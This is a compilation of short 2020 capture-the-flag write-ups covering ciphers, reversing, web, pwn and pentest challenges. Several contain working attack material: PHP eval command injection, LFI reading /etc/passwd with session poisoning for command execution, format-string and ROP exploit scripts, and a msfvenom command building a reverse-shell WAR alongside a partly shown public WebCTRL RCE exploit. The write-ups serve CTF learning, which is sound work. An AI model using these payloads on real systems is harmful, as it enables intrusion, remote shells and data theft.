`BABAAAABAAABABAABABAAABBBAAAAABAABBAABAABAABAABBABABABBAABAAAABAABAABAAAAAAABBAAABBABBAABAAABBBAABAABAAAAAAABBAAAAABABBABABAAAABAABAAAAAABAAAABAABABABABBBAAABAAAAABABAABAABAAAABBAAAABBABAABAAABBBAABAAABABBBAABAABBABAAABAABBABABABBAABAAAABBBAABAABAAAAAABAABAAABABBABABBABABBAABAABAAABBBAABAAABABBAABAABAAABBAAABAAAAAAABBAAABAAAABBBAAAAABAAABBAABAABBABAAAABAABAAAAABBAABAAABABAABAAABAABBAABAABAAAAAABAAAAABBBAAABABBABABBABABBAAABBABBAABAAABBBAABAABAAAABABAAABAAABAAABAABAAAAAAAABABAABABAABAAABAAABAABABABBABBAAAAABBAAAAAAABAABBAABBAAABBBBAABABAABAAABBBAABAAAABABABABAAAAAAAABBAABAAABAAABAAAAABAABBAAABABAABAAABABBAAABABBABABABBAABAAABBABABBAAAABAAABBAAAABAAAABAAAAABBBAAABBAABAABBABAAABAAAAAAABABAABABABAABAAABBBAABAAAABABAAABAAAABAABBABABBAABAABAAABBBAABAABAAABAABAAAAABABAAAAAAAAABABBBBABBAAABABAAAAABAAAAABABBAABAABAAAABAAAB`
After trying binary decoding with no result, we recognised a Bacon cipher, coded on 5 characters. We could have calculated the string length to give us a clue. We used https://www.dcode.fr/bacon-cipher to decrypt the message, this gives
`WELL HAVE TO MEET ANOTHER DAY WERE EXPECTING THEM TO COME HERE SOON THE MESSAGE HAS TO BE DELIVERED SOON OTHERWISE ALL IS FOR NAUGHT THE FLAG IS AUCTF SOMEONE NEEDS TO CALL THE FCC ON THESE CRAZY FARMERS`
Flag: `AUCTF SOMEONE NEEDS TO CALL THE FCC ON THESE CRAZY FARMERS` |
# Sora
## Description
> This obnoxious kid with spiky hair keeps telling me his key can open all doors.>> Can you generate a key to open this program before he does?>> Connect to challenges.auctf.com 30004
## Solution
We decompile the binary using Ghidra, and see that it encrypts the input string and then compares it to the key encrypted with the same function. We just reverse the encryption function and give it the encrypted key found in the file.
```pythonsecret = b"aQLpavpKQcCVpfcg"
key = []
for i in range(len(secret)): for c in range(65, 122): if (c * 8 + 0x13) % 0x3d + 0x41 == secret[i]: key.append(c) print(key)
print("".join([chr(c) for c in key]))```
The key is `try_to_break_meG`. This gives us the flag.
Flag: `auctf{that_w@s_2_ezy_29302}` |
# Hmmm[Full (Combined) Writeup Here](https://gist.github.com/ThePuzzlemaker/4f3657489d8e8dad69652ad1de2b9dff)
## Description
:thinking:
Note: anime girl isn't the flag
(linked binary: ["hmmm"](https://teamisotope.com/ctfs/hexion/2020/hmmm))
## Solution
The binary contains a flag at the beginning: `hexCTF{1m_s0rry_1f_y0u_r3v3r5ed_7h1s}`
It prints out an image with Unicode Braille:
```⢸⣿⣿⣿⣿⠃⠄⢀⣴⡾⠃⠄⠄⠄⠄⠄⠈⠺⠟⠛⠛⠛⠛⠻⢿⣿⣿⣿⣿⣶⣤⡀⠄⢸⣿⣿⣿⡟⢀⣴⣿⡿⠁⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⣸⣿⣿⣿⣿⣿⣿⣿⣷⢸⣿⣿⠟⣴⣿⡿⡟⡼⢹⣷⢲⡶⣖⣾⣶⢄⠄⠄⠄⠄⠄⢀⣼⣿⢿⣿⣿⣿⣿⣿⣿⣿⢸⣿⢫⣾⣿⡟⣾⡸⢠⡿⢳⡿⠍⣼⣿⢏⣿⣷⢄⡀⠄⢠⣾⢻⣿⣸⣿⣿⣿⣿⣿⣿⣿⡿⣡⣿⣿⡟⡼⡁⠁⣰⠂⡾⠉⢨⣿⠃⣿⡿⠍⣾⣟⢤⣿⢇⣿⢇⣿⣿⢿⣿⣿⣿⣿⣿⣱⣿⣿⡟⡐⣰⣧⡷⣿⣴⣧⣤⣼⣯⢸⡿⠁⣰⠟⢀⣼⠏⣲⠏⢸⣿⡟⣿⣿⣿⣿⣿⣿⣿⣿⡟⠁⠄⠟⣁⠄⢡⣿⣿⣿⣿⣿⣿⣦⣼⢟⢀⡼⠃⡹⠃⡀⢸⡿⢸⣿⣿⣿⣿⣿⡟⣿⣿⠃⠄⢀⣾⠋⠓⢰⣿⣿⣿⣿⣿⣿⠿⣿⣿⣾⣅⢔⣕⡇⡇⡼⢁⣿⣿⣿⣿⣿⣿⢣⣿⡟⠄⠄⣾⣇⠷⣢⣿⣿⣿⣿⣿⣿⣿⣭⣀⡈⠙⢿⣿⣿⡇⡧⢁⣾⣿⣿⣿⣿⣿⢏⣾⣿⡇⠄⣼⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⢻⠇⠄⠄⢿⣿⡇⢡⣾⣿⣿⣿⣿⣿⣏⣼⣿⣿⣷⢰⣿⣿⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⢰⣧⣀⡄⢀⠘⡿⣰⣿⣿⣿⣿⣿⣿⠟⣼⣿⣿⢹⣿⢸⣿⣿⠟⠻⢿⣿⣿⣿⣿⣿⣿⣿⣶⣭⣉⣤⣿⢈⣼⣿⣿⣿⣿⣿⣿⠏⣾⣹⣿⣿⢸⠇⡜⣿⡟⠄⠄⠄⠈⠙⣿⣿⣿⣿⣿⣿⣿⣿⠟⣱⣻⣿⣿⣿⣿⣿⠟⠁⢳⠃⣿⣿⣿⠄⣰⡗⠹⣿⣄⠄⠄⠄⢀⣿⣿⣿⣿⣿⣿⠟⣅⣥⣿⣿⣿⣿⠿⠋⠄⠄⣾⡌⢠⣿⡿⠃⠜⠋⢠⣷⢻⣿⣿⣶⣾⣿⣿⣿⣿⠿⣛⣥⣾⣿⠿⠟⠛⠉⠄⠄ ```
I first thought I had to reverse it, because it wouldn't show up in `strings` for some reason. |
# Miyazaki Trivia
## Description
> http://challenges.auctf.com:30020> > Here's a bit of trivia for you vidya game nerds.
## Solution
On the website, only says > Find the special file
So I look if I can acces some files, and http://challenges.auctf.com:30020/index.html works. I then go to one of the common existing files `robots.txt`, and we see

So I fire up Postman and make a GET request to http://challenges.auctf.com:30020/robots.txt, and add the header `answer: Fear the Old Blood`. This gives us the flag.

Flag: `auctf{f3ar_z_olD3_8l0oD}` |
TL;DR Easy challenge, it involves classical ciphers and encoding algorithms.
[Here's the writeup](https://int80h.netlify.com/writeup/byte-bandits-2020-oldschool/) |
# TriviaPassword 1 : `salt`
Networking 1 : `application`
Pwn 2 : `gadgets`
Networking 2 : `DHCP`
Reversing 2 : `obfuscation`
Networking 3 : `ICMP`
Networking 4 : `110.24.32.1 - 110.24.63.254`
Password2 : `Trivia Yahoo!:2017`
Forensics 2 : `Trivia Diffie–Hellman key exchange` |
# Quick Maths
## Description
> http://challenges.auctf.com:30021>> two plus two is four minus three that's one quick maths
## Solution
The website is an online calculator. We give it an expression and it gives us the answer. From this I deduce that a function `eval` is used. Since I can give it a string and returns it to me, the input is not sanitized, and can be exploited.

I find that the backend is in PHP since the file `index.php` leads back to the page.
I try to give it `system('ls')`and it works, I see that there is no `flag.txt`. But trying `system('cat index.php')` and looking at the source code, we see the flag defined here.
Flag: `auctf{p6p_1nj3c7i0n_iz_k3wl}` |
# ▼▼▼FILESTORAGE(Web:122pts,166/661=25.1%)▼▼▼This writeup is written by [**@kazkiti_ctf**](https://twitter.com/kazkiti_ctf)
---
## 【Vulnerability identification】
```GET /index.php?file=../../../../../etc/passwd HTTP/1.1Host: filestorage.tamuctf.com```
↓
```backroot:x:0:0:root:/root:/bin/ashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/mail:/sbin/nologinnews:x:9:13:news:/usr/lib/news:/sbin/nologinuucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologinman:x:13:15:man:/usr/man:/sbin/nologinpostmaster:x:14:12:postmaster:/var/mail:/sbin/nologincron:x:16:16:cron:/var/spool/cron:/sbin/nologinftp:x:21:21::/var/lib/ftp:/sbin/nologinsshd:x:22:22:sshd:/dev/null:/sbin/nologinat:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologinsquid:x:31:31:Squid:/var/cache/squid:/sbin/nologinxfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologingames:x:35:35:games:/usr/games:/sbin/nologincyrus:x:85:12::/usr/cyrus:/sbin/nologinvpopmail:x:89:89::/var/vpopmail:/sbin/nologinntp:x:123:123:NTP:/var/empty:/sbin/nologinsmmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologinguest:x:405:100:guest:/dev/null:/sbin/nologinnobody:x:65534:65534:nobody:/:/sbin/nologinapache:x:100:101:apache:/var/www:/sbin/nologin```
↓
**LFI(Locat File Inclusion)** vulnerability exists
---
## 【exploit】
Send PHP code in request
↓
```POST /index.php HTTP/1.1Host: filestorage.tamuctf.comContent-Type: application/x-www-form-urlencodedCookie: PHPSESSID=diimunr8iaco7vt7alo835ou8g
name=sss```
---
Load code with LFI and execute arbitrary code
↓
```GET /index.php?cmd=ls%20/&file=../../../../../proc/self/fd/9 HTTP/1.1Host: filestorage.tamuctf.comCookie: PHPSESSID=diimunr8iaco7vt7alo835ou8gConnection: close```
↓
```bindevetcflag_is_herehomelibmediamntoptprocrootrunsbinsrvstart.shsystmpusrvar```
↓
`flag_is_here`
---
```GET /index.php?cmd=ls%20/flag_is_here&file=../../../../../proc/self/fd/9 HTTP/1.1Host: filestorage.tamuctf.comCookie: PHPSESSID=diimunr8iaco7vt7alo835ou8gConnection: close```
↓
`flag.txt`
---
```GET /index.php?cmd=cat%20/flag_is_here/flag.txt&file=../../../../../proc/self/fd/9 HTTP/1.1Host: filestorage.tamuctf.comCookie: PHPSESSID=diimunr8iaco7vt7alo835ou8gConnection: close```
↓
`gigem{535510n_f1l3_p0150n1n6}` |
NOTE: To solve this challenge i worked with my teammate Enrico. He wrote the exploit (python 2) first and got the flag. In my writeup i put an optimized exploit for python 3.
Play game:```c__int64 play_game(){ __int64 result; // rax char s; // [rsp+0h] [rbp-40h]
puts("Welcome to this choose your own adventure game!"); puts("You're President Ronald Drump and are tasked with leading the nation through this crisis."); puts("So what do you want to do?"); puts("1. Close the borders."); puts("2. Tell everyone not to panic. It's just the Fake News media freaking out."); fgets(&s, 50, _bss_start); printf("You chose: ", 50LL); printf(&s); if ( s == 49 ) return close_borders(); result = 50 - (unsigned int)(unsigned __int8)s; if ( s == 50 ) result = no_panic(); return result;}````Close borders` and `no panic` functions contains the same instruction, i used close borders.
Close borders:```c__int64 close_borders(){ __int64 result; // rax char s; // [rsp+0h] [rbp-40h]
puts("\nSo we closed our borders. Weren't we doing that anyway with the wall?"); puts("It's still spreading within our borders what do we do now?"); puts("1. Reassure everyone the country can handle this. Our healthcare system is the best. Just the greatest."); puts("2. Make it a national emergency. Show the people we don't need Bernie's healthcare plan."); fgets(&s, 50, _bss_start); printf("You chose: ", 50LL); printf(&s); if ( s == 49 ) return lose3(); result = 50 - (unsigned int)(unsigned __int8)s; if ( s == 50 ) result = lose4(); return result;}```
Checksec:```shell[*] '/home/marco/Desktop/umbccd/coronacation/coronacation' Arch: amd64-64-little RELRO: Full RELRO Stack: No canary found NX: NX enabled PIE: PIE enabled```
In order to call win function, we need two memory leak to bypass PIE / ASLR.We used te first format string (play game function) to leak the rbp (stack section leak) and return address(.text section address).Then with the second format string (in `close_border`), we overwrite the return address with win address.
Exploit:```pythonfrom pwn import *
#p = remote('ctf.umbccd.io', 4300)p = process('./coronacation')print(p.recvuntil('out.\n').decode())payload = (('1 ').encode())payload += (('%14$p %15$p').encode())p.sendline(payload)print(p.recvuntil('chose: 1 ').decode())
stm = p.recvuntil('\n').decode()rbp = int(stm.replace('\n', "").split(' ')[0], 16)ret_stack = rbp-0x8ret = int(stm.replace('\n', "").split(' ')[1], 16)
win = ret-0x31ftowrite = win & 0xffffprint('to write: ', (towrite))print('Leaked base pointer: ', hex(rbp), 'stack address return pointer: ', hex(ret_stack))print('leaked return address: ', hex(ret), ' win function at: ', hex(win))print(p.recvuntil('plan.').decode())
padding = '0'*(8-len(str(towrite))) + str(towrite)
payload2 = ("%" + padding + "lx%8$hn").encode()payload2 += p64(ret_stack)print(payload2)p.sendline(payload2)print(p.recvuntil('}'))
```
# FLAG`DawgCTF{st@y_Th3_f@ck_h0m3}` |
# Extraordinary
## Description
> On their way back from the market, Alice and Bob noticed a little device on the ground. Next to it was a piece of paper with what looked like a bunch of scrambled numbers on it. It looked completely random. They took it to the lost and found, but on their way they played with it a little bit (don't tell anyone!). The device was never picked up, so we get to play with it a little bit, too. Can you figure out how the device works?>> `b'6\x1d\x0cT*\x12\x18V\x05\x13c1R\x07u#\x021Jq\x05\x02n\x03t%1\\\x04@V7P\\\x17aN'`>> `nc challenges.auctf.com 30030`
## Solution
On the sever, it lets us input a string then gives us an encoded string. If we give it `auctf` the return string is empty. If we input `b`, it returns `\x01`. From there we understand that the encryption is a XOR.
To solve it I give as input a string of `a`s, it gives me the encoded string `all_a_encoded`. I can then do a XOR between this string and `a`s, character by character, which gives us the XOR key, `uctf{n3v3R_r3Us3_y0uR_0Tp_872vc8972}uctf{n3v3R_r3Us3_y` (missing the first `a`).
```pythonall_a_encoded = b'\x14\x02\x15\x07\x1a\x0fR\x17R3>\x13R4\x12R>\x18Q\x143>Q5\x11>YVS\x17\x02YXVS\x1c\x14\x02\x15\x07\x1a\x0fR\x17R3>\x13R4\x12R>\x18'
key = [chr(c^ord('a')) for c in all_a_encoded]print(''.join(key))```
This solution doesn't use the given string.
Flag: `auctf{n3v3R_r3Us3_y0uR_0Tp_872vc8972}` |
## Solution* Going to site [https://clearedge.ctf.umbccd.io/](http://) we look at the following.> America's first female cryptanalyst, she said: "Our office doesn't make 'em, we only break 'em". On this day, let her eat cake! Hwyjpgxwkmgvbxaqgzcsnmaknbjktpxyezcrmlja?GqxkiqvcbwvzmmxhspcsqwxyhqentihuLivnfzaknagxfxnctLcchKCH{CtggsMmie_kteqbx} * Looking at the cipher thought of `Vigenere Cipher` and decoded it ([https://www.dcode.fr/vigenere-cipher](http://)) .* On decoding, the Plaintext is > Howdoyoukeepaprogrammerintheshowerallday?GivehimabottleofshampoowhichsaysLatherrinserepeatDawgCTF{ClearEdge_crypto}
**Flag**:`DawgCTF{ClearEdge_crypto}` |
https://outwrest.github.io/writeup/2020/04/13/DawgCTF-Writeup.html
In this challenge, I had to determine which team is ahead by scores by inputting one or a zero based on the input. I quickly figured out the games were tennis since the words love, game, set which correspond to 0, 45, and 6 respectively. Giving the right answers to all the questions ends with a Thank you and a closed connection. This led me to realize that the flag is something that we already figured out, the input. The ones and zeros are binary. |
# Pi day
## Description
> Time to put your problem solving skills to work! Finish the sequence!>> 14, 15, 92, 65, 35, __, __, __, __, __>> NOTE: The flag is NOT in the standard auctf{} format>> flag format - comma separated list 1, 2, 3, 4, 5
## Solution
Giving the sequence to Google easily identifies it a the first decimal of Pi.
Flag: `89, 79, 32, 38, 46` |
Yet again, we begin on a journey to conquer: She's hungry! https://clearedge.ctf.umbccd.io/. Our only hint, she’s hungry!This time since we’ve already gotten three flags out of this page, let’s try to decrypt the ciphertext on the main page:
Hwyjpgxwkmgvbxaqgzcsnmaknbjktpxyezcrmlja?GqxkiqvcbwvzmmxhspcsqwxyhqentihuLivnfzaknagxfxnctLcchKCH{CtggsMmie_kteqbx}
By using a vignere cipher auto solver we found out:
The flag is DawgCTF{clearedge_crypto}. I must admit the non-flag text was kinda funny too, they should have t-shirts with that slogan! XD
View the full writeup [here](https://github.com/abhichitkara/DawgCTF20-Writeups/blob/master/DawgCTF%20Writeups.pdf) |
```python#!/usr/bin/env python# -*- coding: utf-8 -*-# This exploit template was generated via:# $ pwn template --host 79gq4l5zpv1aogjgw6yhhymi4.ctf.p0wnhub.com --port 21337 pwn2from pwn import *
# Set up pwntools for the correct architectureexe = context.binary = ELF('pwn2')
# Many built-in settings can be controlled on the command-line and show up# in "args". For example, to dump all data sent/received, and disable ASLR# for all created processes...# ./exploit.py DEBUG NOASLR# ./exploit.py GDB HOST=example.com PORT=4141host = args.HOST or '79gq4l5zpv1aogjgw6yhhymi4.ctf.p0wnhub.com'port = int(args.PORT or 21337)
def local(argv=[], *a, **kw): '''Execute the target binary locally''' if args.GDB: return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw) else: return process([exe.path] + argv, *a, **kw)
def remote(argv=[], *a, **kw): '''Connect to the process on the remote host''' io = connect(host, port) if args.GDB: gdb.attach(io, gdbscript=gdbscript) return io
def start(argv=[], *a, **kw): '''Start the exploit against the target.''' if args.LOCAL: return local(argv, *a, **kw) else: return remote(argv, *a, **kw)
# Specify your GDB script here for debugging# GDB will be launched if the exploit is run via e.g.# ./exploit.py GDBgdbscript = '''tbreak smsg
b *0x00000000004012D7continue'''.format(**locals())
#===========================================================# EXPLOIT GOES HERE#===========================================================# Arch: amd64-64-little# RELRO: Partial RELRO# Stack: No canary found# NX: NX enabled# PIE: No PIE (0x400000)
def smsg(io, s): io.recvuntil(">") io.send("smsg") for _ in range(0x57): io.recvuntil("->") io.sendline("*") io.recvuntil("Send?(Y/N)") io.sendline("N") io.recvuntil("->") io.sendline(s) io.recvuntil("Send?(Y/N)") io.sendline("Y") io.recvline()
def auth(io): io.recvuntil(">") io.send("auth") io.recvuntil("Enter username: ") io.sendline(".flag")
pop_rsi_pop_r15_ret = 0x0000000000401559pop_rdi_ret = 0x000000000040155bpop_rbp_ret = 0x0000000000401179read_file = 0x00000000004012F3flag_file = 0x0000000000404080
payload = flat([ pop_rsi_pop_r15_ret, 0, 0, pop_rdi_ret, flag_file, pop_rbp_ret, 0x404200, read_file,])
io = start()
auth(io)smsg(io, payload)
flag = io.recv()log.success(flag.decode())``` |
We’re again given the same URL: https://clearedge.ctf.umbccd.io/. Which we saw in the Lady Smuggler challenge before! Let’s once again look at the source of the page for some interesting quirks/hints! I guess my hunch was right once again, On opening the source of the page, we see a line in the code:The alert function is passing a very interesting ASCII code to Letter conversion as a parameter. Let’s copy the ASCII codes and convert them to text to see what it says: Voila! We found another flag: DawgCTF{ClearEdge_uni}
View the full writeup [here](https://github.com/abhichitkara/DawgCTF20-Writeups/blob/master/DawgCTF%20Writeups.pdf) |
We’re given a URL: https://clearedge.ctf.umbccd.io/, which on opening leads to a webpage with 2 images and 2 lines of text, the lower line of text has curly braces {} which indicates that there might be a flag there. But, since this is a 25 point challenge let’s look at the page source to search for some obvious flags! I guess my hunch was right, On opening the source of the page, we see a line in the code: ``` ```
Voila! We found the first flag! :DFlag: DawgCTF{ClearEdge_ElizebethSmith)
View the full writeup [here](https://github.com/abhichitkara/DawgCTF20-Writeups/blob/master/DawgCTF%20Writeups.pdf) |
```import socket
s = socket.socket()
port = 13371host = 'crypto.ctf.umbccd.io'
# connect to the server on local computers.connect((host, port))
s.send(b'flg')flag=(s.recv(1024))print(flag)s.send(b'dec:'+flag)print(s.recv(1024))s.close()``` |
This is the hint we’re given: Welcome! We're trying to hack into Burke Defense Solutions & Management, and we need your help. Can you help us find the password of an affiliate's CEO somewhere on the internet and use it to log in to the corporate site? https://theinternet.ctf.umbccd.io/When we navigate to: https://theinternet.ctf.umbccd.io/burkedefensesolutions.html, we find a list of affiliate CEO’s.
We’re told that one of them has faced a data breach. On going through the facespace page for emery rollins one of the CEO’s we find out that charoletteinternational has had a leak! By searching for the email id’s of all the other CEO’s in the breach document we find out that it was Sonny Bridges! On logging in with his password on the main page we get the flag!
Flag: DawgCTF{th3_w3@k3s7_1!nk}
View the full writeup [here](https://github.com/abhichitkara/DawgCTF20-Writeups/blob/master/DawgCTF%20Writeups.pdf) |
# gg no re
## Description
> http://challenges.auctf.com:30022> > A junior dev built this site but we want you to test it before we send it to production.
## Solution
The website if a simple html page, but looking at the source code, we see that it has a line
```html<script>authentication.js</script>```
So I look for the file in the url, it gives
```jsvar _0x44ff=['TWFrZSBhIEdFVCByZXF1ZXN0IHRvIC9oaWRkZW4vbmV4dHN0ZXAucGhw','aW5jbHVkZXM=','bGVuZ3Ro','bG9n'];(function(_0x43cf52,_0x44ff2a){var _0x2ad1c9=function(_0x175747){while(--_0x175747){_0x43cf52['push'](_0x43cf52['shift']());}};_0x2ad1c9(++_0x44ff2a);}(_0x44ff,0x181));var _0x2ad1=function(_0x43cf52,_0x44ff2a){_0x43cf52=_0x43cf52-0x0;var _0x2ad1c9=_0x44ff[_0x43cf52];if(_0x2ad1['UmZuYF']===undefined){(function(){var _0x4760ee=function(){var _0x335dc0;try{_0x335dc0=Function('return\x20(function()\x20'+'{}.constructor(\x22return\x20this\x22)(\x20)'+');')();}catch(_0x3b3b3e){_0x335dc0=window;}return _0x335dc0;};var _0x1ecd5c=_0x4760ee();var _0x51e136='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';_0x1ecd5c['atob']||(_0x1ecd5c['atob']=function(_0x218781){var _0x1c7e70=String(_0x218781)['replace'](/=+$/,'');var _0x1fccf7='';for(var _0x2ca4ce=0x0,_0x55266e,_0x546327,_0x17b8a3=0x0;_0x546327=_0x1c7e70['charAt'](_0x17b8a3++);~_0x546327&&(_0x55266e=_0x2ca4ce%0x4?_0x55266e*0x40+_0x546327:_0x546327,_0x2ca4ce++%0x4)?_0x1fccf7+=String['fromCharCode'](0xff&_0x55266e>>(-0x2*_0x2ca4ce&0x6)):0x0){_0x546327=_0x51e136['indexOf'](_0x546327);}return _0x1fccf7;});}());_0x2ad1['hdhzHi']=function(_0x5d9b5f){var _0x24b0b1=atob(_0x5d9b5f);var _0x5c5f21=[];for(var _0x390988=0x0,_0xd8eac0=_0x24b0b1['length'];_0x390988<_0xd8eac0;_0x390988++){_0x5c5f21+='%'+('00'+_0x24b0b1['charCodeAt'](_0x390988)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x5c5f21);};_0x2ad1['wrYKfR']={};_0x2ad1['UmZuYF']=!![];}var _0x175747=_0x2ad1['wrYKfR'][_0x43cf52];if(_0x175747===undefined){_0x2ad1c9=_0x2ad1['hdhzHi'](_0x2ad1c9);_0x2ad1['wrYKfR'][_0x43cf52]=_0x2ad1c9;}else{_0x2ad1c9=_0x175747;}return _0x2ad1c9;};function authenticate(_0x335dc0){if(validate(_0x335dc0)){console[_0x2ad1('0x2')](_0x2ad1('0x3'));}};function validate(_0x3b3b3e){return _0x3b3b3e[_0x2ad1('0x1')]>=0x5&&_0x3b3b3e[_0x2ad1('0x0')]('$');}```
This is unreadable, but looking at the first line I see some string that look like base64. I decode the first one with https://www.asciitohex.com/, it gives `Make a GET request to /hidden/nextstep.php`.
So I go to http://challenges.auctf.com:30022/hidden/nextstep.php, which doesn't give us much, simple html page. I look for Network tab in the Inspector and look at the response header, and indeed there is the added header `ROT13: Znxr n CBFG erdhrfg gb /ncv/svany.cuc` (it can also be a different header with a different encoding). This is a ROT13, or caesar code. I give it to https://www.asciitohex.com/, and it says `Make a POST request to /api/final.php`.
I use Postman to do this. The response says `Send a request with the flag variable set`. So I add a form-data body with name `flag` and no value, send the request and it gives the flag.
Flag: `auctf{1_w@s_laZ_w1t_dis_0N3}` |
# free wifi part 2
while analyzing the pcap file I captured all the pincodes in a file```nonce=MjAyMC0wNC0wOCAxNzowMg==;passcode=01c7aeb1
WifiKey nonce=MjAyMC0wNC0wOCAxNzowMw==; passcode=097b3acf
nonce=MjAyMC0wNC0wOCAxNzoxMw== passcode=54f03ae2```
while examining /staff.html I saw a cookie called wifi-alg it had the value sha1after playing around I discovered that the pincode is just the first 8 letters of the sha1 of the base64d nonce
so I fired up python and done :D```>>> import hashlib>>> hashlib.sha1("MjAyMC0wNC0xMiAxNDo1OA==".encode()).hexdigest()[:8] '519db8fd'```the flag`DawgCTF{k3y_b@s3d_l0g1n!}` |
Is the shield for keeping things in or keeping things out?https://clearedge.ctf.umbccd.io/ Once again we get a challenge with the same URL, there is a hint in the text which tell us that the shield plays a key role, let’s do some steganography extracting on the shield image. Using the stegonline tool by geormnet, we uncover the png ‘Red 0’ bit panes for the image and voila we got our flag! :D Flag: DawgCTF{ClearEdge_hiddenimage}
View the full writeup [here](https://github.com/abhichitkara/DawgCTF20-Writeups/blob/master/DawgCTF%20Writeups.pdf) |
We’re told to “Find the flag in the network traffic” & given a .pcap network traffic capture file. Let’s open wireshark to see what we get, on opening wireshark we find out there are multiple UDP, TCP & HTTP Packets.
Let’s apply the first hack in the forensics wireshark playbook. Follow the TCP Stream (Select a TCP Packet and press Ctrl+ Alt + Shift + T). On following the TCP Stream we get this request: It is a get request being made for the file flag.txt, at the end of the request we can see a base 64 encoded text that looks like our flag: RGF3Z0NURntuMWMzX3kwdV9mMHVuZF9tM30=
Let’s decrypt it: DawgCTF{n1c3_y0u_f0und_m3}. We got our flag!
View the full writeup [here](https://github.com/abhichitkara/DawgCTF20-Writeups/blob/master/DawgCTF%20Writeups.pdf) |
Welcome! We're trying to hack into Burke Defense Solutions & Management, and we need your help. Can you help us find the mother of the help desk employee's name with their maiden name somewhere on the internet (the mother's URL will be the flag)?https://theinternet.ctf.umbccd.io/
Since we had already found out the team in Royce joyce’s page, read chal2 writeup for deets. We go through their pages one by one: we find out that Orlando Sanford is the help desk employee, on his facespace page, we find out his mother’s name!
And on her facespace page in the URL we get the flag!
Flag: DawgCTF{AlexusCunningham} |
Welcome! We're trying to hack into Burke Defense Solutions & Management, and we need your help. Can you help us find the syncedin page of the linux admin somewhere on the internet (their URL will be the flag)?https://theinternet.ctf.umbccd.io/
Since we had already found out the team in Royce joyce’s page, read chal2 writeup for deets. We go through their pages one by one: on Hope Rocha’s page we find out that Guillermo McCoy is the new Linux Admin! On his page we get the flag in the URL:
Flag: DawgCTF{GuillermoMcCoy}
|
Welcome! We're trying to hack into Burke Defense Solutions & Management, and we need your help. Can you help us find the CTO's password somewhere on the internet and use it to log in to the corporate site?https://theinternet.ctf.umbccd.io/
Since we had already found out that the CTO is Royce Joyce, read chal2 writeup for deets. We go through his page for deets. Isabela Baker is another CTO but she is a red herring. On his page we find out skayou is great and if you scroll down on his page his first post was “I love skayou” so definitely his password leak in the breach, let’s find out using the databreach option on the home page of this challenge: As expected we got his credentials in the skayou breach, now we just need to login on the corporate’s website, On logging in we get the flag!
Flag:DawgCTF{xkcd_p@ssw0rds_rul3} That was the last writeup for the pentest challenges, hope you had fun reading them! ? |
# TriviaPassword 1 : `salt`
Networking 1 : `application`
Pwn 2 : `gadgets`
Networking 2 : `DHCP`
Reversing 2 : `obfuscation`
Networking 3 : `ICMP`
Networking 4 : `110.24.32.1 - 110.24.63.254`
Password2 : `Trivia Yahoo!:2017`
Forensics 2 : `Trivia Diffie–Hellman key exchange` |
# DawgCTF 2020 – In ctrl + Percival PCAP Pandemonium
These are multiple challenges connected together.
## In ctrl
* **Category:** misc* **Points:** 200
### Challenge
> WebCtrl is really secure I don't know what you're talking about.> > Note: All links are identical and only one link is needed to solve the challenge.> > percival1.ctf.umbccd.io percival2.ctf.umbccd.io percival3.ctf.umbccd.io percival4.ctf.umbccd.io percival5.ctf.umbccd.io> > Author: drew, Percival
### Solution
The host has an installation of WebCTRL system. It allows building operators to optimize and manage all of their building systems - including HVAC, lighting, fire, elevators, and security - all within a single HVAC controls platform. It's everything they need to keep occupants comfortable, manage energy conservation measures, identify key operational problems, and validate the results.
The installed system allows you to authenticate with `Administrator` user and no password or without username and password with `Anonymous` user.
Once logged you can discover the version of WebCTRL is 6.0.
Googling around, you can discover that the system is vulnerable to an Unrestricted File Upload which could lead to Remote Code Execution; a [public exploit is available](https://www.exploit-db.com/exploits/42544).
The issue is caused due to the improper verification when uploading Add-on (`.addons` or `.war`) files using the `uploadwarfile` servlet. This can be exploited to execute arbitrary code by uploading a malicious web archive file that will run automatically and can be accessed from within the webroot directory.
A malicious `.war` file can be created with the following command.
```m3ssap0@server:~$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=x.x.x.x LPORT=1337 -f war > m3ssap0.warPayload size: 1100 bytesFinal size of war file: 1100 bytes```
The original [public exploit](https://www.exploit-db.com/exploits/42544) was not working correctly due to errors with authentication. So I patched it to accept two more input parameters:* authentication cookies which you can get after login on the web application;* `wbs` token which you can grab analyzing HTTP traffic to the web application.
The [patched exploit](https://github.com/m3ssap0/CTF-Writeups/raw/master/DawgCTF%202020/In%20ctrl%20%2B%20Percival%20PCAP%20Pandemonium/exploit.py) is the following.
```pythonimport itertoolsimport mimetoolsimport mimetypesimport cookielibimport binasciiimport urllib2import urllibimport sysimport reimport os
from urllib2 import URLErrorglobal bindata
__author__ = 'lqwrm'
piton = os.path.basename(sys.argv[0])
def bannerche(): print ''' @-------------------------------------------------@ | | | WebCTRL 6.5 Authenticated RCE PoC | | ID: ZSL-2017-5431 | | Copyleft (c) 2017, Zero Science Lab | | | @-------------------------------------------------@ ''' if len(sys.argv) < 3: print '[+] Usage: '+piton+' <IP> <WAR FILE> <COOKIES> <WBS TOKEN>' print '[+] Example: '+piton+' 10.0.0.17 webshell.war\n' sys.exit()
bannerche()
host = sys.argv[1]filename = sys.argv[2]cookies = sys.argv[3]token = sys.argv[4]
with open(filename, 'rb') as f: content = f.read()hexo = binascii.hexlify(content)bindata = binascii.unhexlify(hexo)
cj = cookielib.CookieJar()opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))urllib2.install_opener(opener)
print '[+] Probing target http://'+host
